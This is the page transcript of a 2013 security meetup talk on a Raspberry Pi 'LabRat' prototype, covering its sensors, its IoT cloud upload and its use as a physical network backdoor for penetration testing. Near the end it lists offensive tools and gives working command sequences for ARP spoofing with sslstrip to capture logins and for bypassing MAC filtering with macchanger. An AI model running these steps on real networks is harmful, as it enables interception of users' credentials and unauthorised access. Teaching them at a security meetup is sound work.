The LabRat - Physical backdoor hacks and IOT primer
Upcoming SlideShare
Loading in...5

The LabRat - Physical backdoor hacks and IOT primer



null Bangalore Chapter - July 2013 Meet

null Bangalore Chapter - July 2013 Meet



Total Views
Views on SlideShare
Embed Views



1 Embed 310 310



Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

The LabRat - Physical backdoor hacks and IOT primer The LabRat - Physical backdoor hacks and IOT primer Presentation Transcript

  • The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer Akshat Sharma, TME, Cisco Systems.
  • The Raspberry Pi Image Downloads and Updates -- working with gpio interfacing with screens. Google’s your Best Friend
  • Raspberry Pi as a Physical Backdoor into your network It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello Rogue APs Mac Spoofing on wired Networks MITM attacks
  • Humidity Sensor CH0 CH3 CLK CS (AL) MOSI MISO IR LED - Receiver IR LED - Receiver Optical Fiber CH1 CH2 Binary Signal In Binary Signal In The LabRat Circuit Temperature Sensor Humidity Sensor Optical Fiber Tester
  • The LabRat- a Proof of Concept Prototype The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype. To get more info on the Raspberry pi – visit
  • The LabRat Prototype Current Setup 10 inch Capacitive Touchscreen Optical Fiber Tester Humidity Sensor Temperature Sensor Raspberry-Pi HDMi-to-LVDS converter board 10,000 mAH Lithium Polymer Battery
  • The LabRat Prototype LM 35 + ADS7841 Temperature Sensor LM 35 Temperature SensorADS7841 Analog to Digital Converter
  • The LabRat Prototype Humidity Sensor SMD + ADS7841 ADS7841 Analog to Digital Converter Humidity Sensor SMD
  • The LabRat Prototype Optical Fiber Tester Optical Fiber Holders Infra-red LED-Receiver Combination to transmit Messages via the Fiber
  • Connecting to an IOT Cloud ⁻ ⁻ Formerly Cosm, Pachube
  • Set up a Cosm (Now Xively) Account • Register on cosm (xively) and Add Device • You will Receive an API Key and FEED ID • Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
  • Setting up the Python Script to send Data to Xively Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python install Set up Python Script # source eeml package import eeml <snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
  • The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at
  • The LabRat Prototype Python Scripts 1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics. 2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
  • The LabRat Prototype Current List of Penetration-Testing Tools Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp
  • DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and macchanger - Packet Sniffing using Wireshark - Other MITM attacks
  • Arp Spoofing and Mac-Spoofing Attacks Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward • Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address> • Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080 Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed devices> wlan0 • Ifconfig wlan0 up
  • Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
  • Thank You